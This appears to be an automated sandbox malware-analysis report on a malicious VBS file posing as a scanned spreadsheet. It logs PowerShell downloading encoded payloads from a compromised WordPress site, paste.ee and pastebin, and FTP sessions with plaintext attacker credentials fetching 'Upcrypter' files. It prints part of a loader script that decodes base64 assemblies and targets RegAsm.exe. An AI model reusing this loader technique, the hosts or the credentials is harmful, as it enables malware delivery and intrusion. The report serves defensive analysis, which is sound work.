                                Data Ascii: p6fg4:::QRDXsT:::EERYDERQSC286:::GLQZzPg::CnoRDiD4::::1hMXHwo4Tv7//wMRDhzWKEE:::oX2hMaHws4Of7//xYTGx8MOC/+//84p:::::


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.649719173.231.247.1004436764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 07:28:19 UTC106OUTGET /wp-includes/customize/css/bd.txt HTTP/1.1
                                Host: www.gratitudeseekers.com
                                Connection: Keep-Alive
                                2024-10-03 07:28:19 UTC209INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:19 GMT
                                Server: Apache
                                Last-Modified: Tue, 01 Oct 2024 10:57:16 GMT
                                Accept-Ranges: bytes
                                Content-Length: 658776
                                Connection: close
                                Content-Type: text/plain
                                2024-10-03 07:28:19 UTC7983INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41
                                Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBA
                                2024-10-03 07:28:19 UTC8000INData Raw: 56 31 77 45 4e 32 54 6a 37 30 6b 4d 4e 42 54 7a 6b 30 77 49 4e 37 52 54 63 30 63 47 4e 67 52 54 55 30 73 45 4e 45 52 54 4f 79 30 72 4d 79 4b 6a 55 78 6f 66 4d 30 48 6a 37 78 73 64 4d 4e 48 54 78 78 34 61 4d 6b 47 54 6d 78 4d 5a 4d 4f 47 54 61 78 41 57 4d 38 45 44 4e 77 55 50 4d 74 44 44 72 77 45 4b 4d 4f 42 44 53 41 41 41 41 67 43 41 42 51 43 77 50 68 2f 54 32 2f 73 38 50 44 2f 6a 75 2f 45 37 50 70 2b 54 6f 2f 6b 35 50 4f 2b 44 66 2f 51 33 50 6f 39 44 59 2f 63 31 50 4f 39 6a 52 2f 34 7a 50 32 38 6a 4c 2f 45 79 50 56 38 54 44 2b 38 73 50 6a 36 7a 64 2b 41 6c 50 4b 35 44 52 2b 34 6a 50 32 34 6a 4d 2b 63 69 50 59 34 44 44 39 73 66 50 76 33 54 33 39 6b 62 50 71 32 44 6e 39 6f 58 50 31 31 44 63 39 77 56 50 52 31 44 50 39 38 53 50 6b 77 54 39 38 63 4e 50 53 7a
                                Data Ascii: V1wEN2Tj70kMNBTzk0wIN7RTc0cGNgRTU0sENERTOy0rMyKjUxofM0Hj7xsdMNHTxx4aMkGTmxMZMOGTaxAWM8EDNwUPMtDDrwEKMOBDSAAAAgCABQCwPh/T2/s8PD/ju/E7Pp+To/k5PO+Df/Q3Po9DY/c1PO9jR/4zP28jL/EyPV8TD+8sPj6zd+AlPK5DR+4jP24jM+ciPY4DD9sfPv3T39kbPq2Dn9oXP11Dc9wVPR1DP98SPkwT98cNPSz
                                2024-10-03 07:28:19 UTC8000INData Raw: 48 32 49 52 4e 76 57 6a 6f 31 51 59 4e 2b 56 44 65 31 45 58 4e 6d 56 7a 56 31 67 51 4e 43 51 6a 34 30 30 4e 4e 52 54 7a 76 30 41 4b 4e 61 53 7a 6b 30 67 49 4e 66 52 7a 56 30 55 45 4e 2f 51 7a 4a 30 67 78 4d 6e 50 54 34 7a 34 38 4d 2f 4f 54 66 7a 73 30 4d 6d 4d 54 41 79 77 71 4d 64 4b 7a 56 79 55 6b 4d 65 45 54 38 78 67 65 4d 67 48 44 77 78 6b 61 4d 63 47 6a 6b 78 4d 59 4d 76 46 6a 54 78 6b 55 4d 44 46 7a 4b 78 51 43 4d 6b 43 54 62 77 67 46 41 41 41 41 33 41 45 41 49 41 41 41 41 2f 63 6d 50 6a 36 44 6e 2b 55 70 50 4f 36 44 68 2b 51 6c 50 4e 35 6a 42 39 49 65 50 30 31 44 4b 39 30 52 50 4f 30 7a 41 38 41 50 50 4f 7a 7a 74 38 55 35 4f 4a 6e 44 66 35 41 32 4e 66 66 44 57 33 77 30 4e 71 63 7a 46 33 34 77 4e 47 63 44 41 32 4d 76 4e 75 62 6a 34 32 30 74 4e 52 62
                                Data Ascii: H2IRNvWjo1QYN+VDe1EXNmVzV1gQNCQj400NNRTzv0AKNaSzk0gINfRzV0UEN/QzJ0gxMnPT4z48M/OTfzs0MmMTAywqMdKzVyUkMeET8xgeMgHDwxkaMcGjkxMYMvFjTxkUMDFzKxQCMkCTbwgFAAAA3AEAIAAAA/cmPj6Dn+UpPO6Dh+QlPN5jB9IeP01DK90RPO0zA8APPOzzt8U5OJnDf5A2NffDW3w0NqczF34wNGcDA2MvNubj420tNRb
                                2024-10-03 07:28:19 UTC8000INData Raw: 41 41 41 77 2f 41 6f 36 2f 2f 44 51 6b 33 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 4b 43 2f 2f 41 6f 49 38 2f 44 67 69 77 2f 50 41 52 65 2f 2f 41 6f 36 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAw/Ao6//DQk3/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PAKC//AoI8/Dgiw/PARe//Ao6/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                2024-10-03 07:28:19 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6a 48 65 59 2b 66 6b 52 61 38 2f 70 6d 4b 33 2f 4c 73 77 31 2f 50 33 63 2f 2f 2f 34 6a 2f 2f 2f 76 39 32 73 76 38 6b 54 61 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAA/jHeY+fkRa8/pmK3/Lsw1/P3c///4j///v92sv8kTaMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                2024-10-03 07:28:19 UTC8000INData Raw: 6c 56 71 38 2f 57 61 4a 7a 2f 2f 34 6a 37 36 4f 50 38 49 6b 36 70 6b 53 4b 71 72 69 4b 71 6f 75 4b 71 6f 79 31 72 73 79 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 76 65 32 5a 6e 68 65 63 78 5a 49 36 77 42 6e 68 6f 4c 6e 63 48 69 2b 63 7a 78 49 36 31 56 58 6b 6f 66 33 64 54 69 75 65 36 6c 4a 36 39 31 6e 6e 7a 32 58 66 58 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: lVq8/WaJz//4j76OP8Ik6pkSKqriKqouKqoy1rsyKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAve2ZnhecxZI6wBnhoLncHi+czxI61VXkof3dTiue6lJ691nnz2XfXCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                2024-10-03 07:28:19 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 45 5a 30 4e 48 51 75 39 57 61 30 42 58 5a 6a 68 58 5a 57 46 30 50 75 41
                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEZ0NHQu9Wa0BXZjhXZWF0PuA
                                2024-10-03 07:28:19 UTC8000INData Raw: 79 41 41 77 51 45 56 47 64 6c 78 57 5a 45 42 77 34 41 41 41 64 6a 56 6d 61 69 39 55 5a 30 56 47 62 6c 52 45 41 6d 44 51 51 44 52 55 5a 30 46 57 5a 79 4e 45 41 78 41 41 41 42 52 33 59 6c 70 6d 59 50 52 58 5a 48 46 77 2b 41 41 41 62 73 52 6d 4c 79 4d 6a 55 46 4e 56 56 41 55 6e 62 6c 31 45 63 31 42 33 62 51 56 47 64 68 56 6d 63 44 42 77 61 41 41 51 64 75 56 57 54 77 56 48 63 76 42 31 61 6a 46 6d 63 55 4a 67 39 41 41 51 51 6a 39 6d 63 51 64 33 62 6b 35 57 61 58 5a 57 5a 45 42 77 6d 41 45 45 65 46 64 33 62 6b 35 57 61 58 56 47 64 68 56 6d 63 44 42 51 62 41 45 55 64 75 56 57 54 6b 35 57 5a 77 42 58 51 41 6b 41 41 41 45 45 65 46 4e 33 63 68 78 32 51 79 56 47 64 7a 6c 32 5a 6c 4a 6c 41 4d 42 41 41 7a 39 47 55 79 39 32 63 79 56 33 51 30 56 32 52 42 41 43 41 58 39
                                Data Ascii: yAAwQEVGdlxWZEBw4AAAdjVmai9UZ0VGblREAmDQQDRUZ0FWZyNEAxAAABR3YlpmYPRXZHFw+AAAbsRmLyMjUFNVVAUnbl1Ec1B3bQVGdhVmcDBwaAAQduVWTwVHcvB1ajFmcUJg9AAQQj9mcQd3bk5WaXZWZEBwmAEEeFd3bk5WaXVGdhVmcDBQbAEUduVWTk5WZwBXQAkAAAEEeFN3chx2QyVGdzl2ZlJlAMBAAz9GUy92cyV3Q0V2RBACAX9
                                2024-10-03 07:28:19 UTC8000INData Raw: 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 54 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 41 41 45 4e 67 5a 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 55 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 41 41 52 44 63 42 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 77 2f 2f 2f 50 30 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 41 51 55 41 5a 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 44 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 52 41 34 46 41 41 41 41 41 41 41 41 41 41 41 41 52 41 73 49 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 77 2f 2f 2f 50 78 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 41 51 45 41 69 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 54 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44
                                Data Ascii: AAAw///v/AAAAA8///TNAAAAA////+DAAAAAAENgZAAAAA8///7PAAAAA////UDAAAAw///v/AAAAAAARDcBAAAAA////+DAAAAw///P0AAAAA8///7PAAAAAAQUAZDAAAAw///v/AAAAA8///DNAAAAA////+DARA4FAAAAAAAAAAAARAsIAAAAA////+DAAAAw///PxAAAAA8///7PAAAAAAQEAiDAAAAw///v/AAAAA8///TNAAAAA////+D
                                2024-10-03 07:28:19 UTC8000INData Raw: 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 43 52 46 52 46 55 5a 4a 31 51 4f 56 45 49 4f 6c 30 52 46 4a 55 4c 74 30 53 4c 74 41 41 41 41 30 53 4c 74 30 53 4c 5a 56 30 53 67 55 45 56 42 5a 56 53 53 42 46 49 45 35 55 52 74 30 53 4c 74 30 43 41 74 30 53 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 69 54 4a 64 55 52 43 31 53 4c 74 30 53 4c 41 41 41 41 74 30 53 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 53 51 54 4a 46 49 45 35 55 52 74 30 53 4c 74 30 43 41 74 30 53 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 53 51 54 4a 46 49 4f 6c 30 52 46 4a 55 4c 74 30 53 4c 74 41 41 41 74 30 53 4c 74 30 43 54 53 4e 45 49 35 41 54 4e 59 42 43 52 4f 56 55 4c 74 30 53 4c 74 41 41 41 41 41 51 4c 74 30 53 4c 74 77 6b 55 44 42
                                Data Ascii: Lt0SWFtEIFRVQWlkUQBCRFRFUZJ1QOVEIOl0RFJULt0SLtAAAA0SLt0SLZV0SgUEVBZVSSBFIE5URt0SLt0CAt0SLt0SWFtEIFRVQWlkUQBiTJdURC1SLt0SLAAAAt0SLt0SWFtEIFRVQWlkUQBSQTJFIE5URt0SLt0CAt0SLt0SWFtEIFRVQWlkUQBSQTJFIOl0RFJULt0SLtAAAt0SLt0CTSNEI5ATNYBCROVULt0SLtAAAAAQLt0SLtwkUDB


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.649722188.114.97.34436764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 07:28:21 UTC43OUTGET /d/Ga0HE/0 HTTP/1.1
                                Host: paste.ee
                                2024-10-03 07:28:22 UTC1197INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:21 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 541
                                Connection: close
                                Cache-Control: max-age=2592000
                                strict-transport-security: max-age=63072000
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1; mode=block
                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTIK77JQmffUdPZ1eJnxcSrA0F2vI944viQPgxsbTd1rVHPGivmlvOzDvShKiavpJIULnvzYd2LSyoxQlSELA%2FtNI10hoqEs5bSm%2BK%2FcvQEiwE0MrKORLY4Q6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ccb37078e1b4384-EWR
                                2024-10-03 07:28:22 UTC172INData Raw: 24 64 71 73 78 42 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 27 52 65 67 41 73 6d 2e 65 78 65 27 3b 0a 0a 24 66 56 4c 46 55 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 6a 75 4e 6d 51 20 3d 20 27 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28 20 24 66 56 4c 46 55 2c 20 24 6a 75 4e 6d 51 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c
                                Data Ascii: $dqsxB = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'RegAsm.exe';$fVLFU = ':';$juNmQ = 'A';$WYvtt = '%qlxKP%'.replace( $fVLFU, $juNmQ );[Byte[]] $l
                                2024-10-03 07:28:22 UTC369INData Raw: 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 57 59 76 74 74 20 29 3b 0a 0a 24 6d 5a 69 6f 61 20 3d 20 27 25 6e 6b 47 4d 76 25 27 2e 72 65 70 6c 61 63 65 28 20 24 66 56 4c 46 55 2c 20 24 6a 75 4e 6d 51 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 61 6e 4b 6c 6f 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 6d 5a 69 6f 61 20 29 3b 0a 0a 24 61 7a 45 51 61 20 3d 20 22 43 6c 61 73 73 31 22 3b 0a 24 57 77 78 47 71 20 3d 20 22 52 75 6e 22 20 3b 0a 24 6e 6c 66 79 77 20 3d 20 22 43 6c 61 73 73 4c 69 62 72 61 72 79 31 2e 22 3b 0a 0a 5b 53 79 73 74 65 6d 2e 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e
                                Data Ascii: aWwJ = [System.Convert]::FromBase64String( $WYvtt );$mZioa = '%nkGMv%'.replace( $fVLFU, $juNmQ );[Byte[]] $anKlo = [System.Convert]::FromBase64String( $mZioa );$azEQa = "Class1";$WwxGq = "Run" ;$nlfyw = "ClassLibrary1.";[System.AppDomain]::Curren


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.649724104.20.4.2354433796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 07:28:23 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-03 07:28:24 UTC391INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:24 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: EXPIRED
                                Last-Modified: Thu, 03 Oct 2024 07:28:24 GMT
                                Server: cloudflare
                                CF-RAY: 8ccb3715ea2d42fe-EWR
                                2024-10-03 07:28:24 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                Data Ascii: 6false,
                                2024-10-03 07:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.649728104.20.4.2354432168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 07:28:28 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-03 07:28:28 UTC395INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:28 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: HIT
                                Age: 4
                                Last-Modified: Thu, 03 Oct 2024 07:28:24 GMT
                                Server: cloudflare
                                CF-RAY: 8ccb3730e9384387-EWR
                                2024-10-03 07:28:28 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                Data Ascii: 6false,
                                2024-10-03 07:28:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.649732104.20.4.2354435412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 07:28:35 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-03 07:28:35 UTC396INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:35 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: HIT
                                Age: 11
                                Last-Modified: Thu, 03 Oct 2024 07:28:24 GMT
                                Server: cloudflare
                                CF-RAY: 8ccb375f9ce90f84-EWR
                                2024-10-03 07:28:35 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                Data Ascii: 6false,
                                2024-10-03 07:28:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                FTP Packets

                                TimestampSource PortDest PortSource IPDest IPCommands
                                Oct 3, 2024 09:28:09.531840086 CEST2149711191.252.83.213192.168.2.6220 "Servico de FTP da Locaweb"
                                Oct 3, 2024 09:28:09.532802105 CEST4971121192.168.2.6191.252.83.213USER desckvbrat1
                                Oct 3, 2024 09:28:09.761440039 CEST2149711191.252.83.213192.168.2.6331 Username ok, send password.
                                Oct 3, 2024 09:28:09.761626005 CEST4971121192.168.2.6191.252.83.213PASS developerpro21578Jp@@
                                Oct 3, 2024 09:28:09.999851942 CEST2149711191.252.83.213192.168.2.6230 Login successful.
                                Oct 3, 2024 09:28:10.227607965 CEST2149711191.252.83.213192.168.2.6501 Invalid argument.
                                Oct 3, 2024 09:28:10.227845907 CEST4971121192.168.2.6191.252.83.213PWD
                                Oct 3, 2024 09:28:10.455776930 CEST2149711191.252.83.213192.168.2.6257 "/" is the current directory.
                                Oct 3, 2024 09:28:10.455993891 CEST4971121192.168.2.6191.252.83.213TYPE I
                                Oct 3, 2024 09:28:10.683629036 CEST2149711191.252.83.213192.168.2.6200 Type set to: Binary.
                                Oct 3, 2024 09:28:10.683801889 CEST4971121192.168.2.6191.252.83.213PASV
                                Oct 3, 2024 09:28:10.912352085 CEST2149711191.252.83.213192.168.2.6227 Entering passive mode (191,252,83,213,236,159).
                                Oct 3, 2024 09:28:10.919930935 CEST4971121192.168.2.6191.252.83.213RETR Upcrypter/01/DLL01.txt
                                Oct 3, 2024 09:28:11.149014950 CEST2149711191.252.83.213192.168.2.6150 File status okay. About to open data connection.
                                Oct 3, 2024 09:28:11.545571089 CEST2149711191.252.83.213192.168.2.6226 Transfer complete.
                                Oct 3, 2024 09:28:15.422820091 CEST2149715191.252.83.213192.168.2.6220 "Servico de FTP da Locaweb"
                                Oct 3, 2024 09:28:15.423199892 CEST4971521192.168.2.6191.252.83.213USER desckvbrat1
                                Oct 3, 2024 09:28:15.645931959 CEST2149715191.252.83.213192.168.2.6331 Username ok, send password.
                                Oct 3, 2024 09:28:15.646159887 CEST4971521192.168.2.6191.252.83.213PASS developerpro21578Jp@@
                                Oct 3, 2024 09:28:15.877351046 CEST2149715191.252.83.213192.168.2.6230 Login successful.
                                Oct 3, 2024 09:28:16.100557089 CEST2149715191.252.83.213192.168.2.6501 Invalid argument.
                                Oct 3, 2024 09:28:16.101016998 CEST4971521192.168.2.6191.252.83.213PWD
                                Oct 3, 2024 09:28:16.517503023 CEST2149715191.252.83.213192.168.2.6257 "/" is the current directory.
                                Oct 3, 2024 09:28:16.518407106 CEST4971521192.168.2.6191.252.83.213TYPE I
                                Oct 3, 2024 09:28:16.740761995 CEST2149715191.252.83.213192.168.2.6200 Type set to: Binary.
                                Oct 3, 2024 09:28:16.741871119 CEST4971521192.168.2.6191.252.83.213PASV
                                Oct 3, 2024 09:28:16.966068983 CEST2149715191.252.83.213192.168.2.6227 Entering passive mode (191,252,83,213,235,101).
                                Oct 3, 2024 09:28:16.974225998 CEST4971521192.168.2.6191.252.83.213RETR Upcrypter/01/Rumpe.txt
                                Oct 3, 2024 09:28:17.197835922 CEST2149715191.252.83.213192.168.2.6150 File status okay. About to open data connection.
                                Oct 3, 2024 09:28:17.583909035 CEST2149715191.252.83.213192.168.2.6226 Transfer complete.
                                Oct 3, 2024 09:28:20.258150101 CEST4971521192.168.2.6191.252.83.213PASV
                                Oct 3, 2024 09:28:20.480519056 CEST2149715191.252.83.213192.168.2.6227 Entering passive mode (191,252,83,213,236,93).
                                Oct 3, 2024 09:28:20.487405062 CEST4971521192.168.2.6191.252.83.213RETR Upcrypter/01/Entry.txt
                                Oct 3, 2024 09:28:20.710704088 CEST2149715191.252.83.213192.168.2.6150 File status okay. About to open data connection.
                                Oct 3, 2024 09:28:21.101475000 CEST2149715191.252.83.213192.168.2.6226 Transfer complete.

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:03:28:02
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                                Imagebase:0x7ff6df030000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
